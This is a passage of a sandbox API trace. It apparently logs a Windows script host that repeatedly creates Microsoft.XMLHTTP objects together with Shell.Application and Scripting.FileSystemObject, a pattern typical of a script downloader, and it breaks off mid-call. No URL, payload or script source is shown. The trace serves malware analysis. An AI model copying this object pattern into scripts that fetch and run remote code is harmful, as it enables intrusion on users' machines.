	[0576.581] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0576.581] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0576.581] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0576.582] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0576.582] SysStringLen (param_1=0x0) returned 0x0
	[0576.582] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0576.582] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0576.582] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0576.582] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0576.582] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0576.582] ??2@YAPEAX_K@Z () returned 0x62f350
	[0576.582] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0576.582] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0576.582] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0576.582] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0576.582] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0576.583] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0576.583] SysStringLen (param_1=0x0) returned 0x0
	[0576.583] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0576.586] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0576.586] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0576.586] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0576.586] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0576.586] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0576.586] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0578.294] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0578.295] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0578.295] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0578.296] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0578.296] SysStringLen (param_1=0x0) returned 0x0
	[0578.296] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0578.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0578.297] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0578.297] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0578.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7528) returned 0x0
	[0578.297] ??2@YAPEAX_K@Z () returned 0x62f330
	[0578.297] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7528, pUnkSite=0x62f330) 
	[0578.297] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0578.297] XMLHTTPRequest:IUnknown:Release (This=0x49c7528) returned 0x0
	[0578.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0578.297] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0578.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0578.297] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0578.300] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0578.300] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0578.300] SysStringLen (param_1=0x0) returned 0x0
	[0578.300] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0578.300] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0578.300] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0578.300] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0578.300] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0578.300] ??2@YAPEAX_K@Z () returned 0x62f310
	[0578.301] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0578.301] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0578.301] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0578.301] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0578.301] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0578.301] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0578.301] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0578.301] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0578.301] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0578.301] SysStringLen (param_1=0x0) returned 0x0
	[0578.301] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0578.302] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0578.302] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0578.302] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0578.302] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0578.302] ??2@YAPEAX_K@Z () returned 0x62f330
	[0578.302] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f330) 
	[0578.302] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0578.302] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0578.302] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0578.302] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0578.302] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0578.302] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0578.302] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0578.302] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0578.302] SysStringLen (param_1=0x0) returned 0x0
	[0578.302] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0578.303] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0578.303] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7540) returned 0x0
	[0578.303] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0578.303] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0578.303] ??2@YAPEAX_K@Z () returned 0x62f310
	[0578.303] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0578.303] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0578.303] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0578.303] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7540) returned 0x0
	[0578.303] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7540) returned 0x3
	[0578.303] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0578.303] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0578.303] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0578.303] longjmp () 
	[0578.303] longjmp () 
	[0578.304] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0578.304] SysStringLen (param_1=0x0) returned 0x0
	[0578.304] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0578.304] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0578.304] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0578.304] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0578.304] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bf8) returned 0x0
	[0578.304] ??2@YAPEAX_K@Z () returned 0x62f330
	[0578.304] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bf8, pUnkSite=0x62f330) 
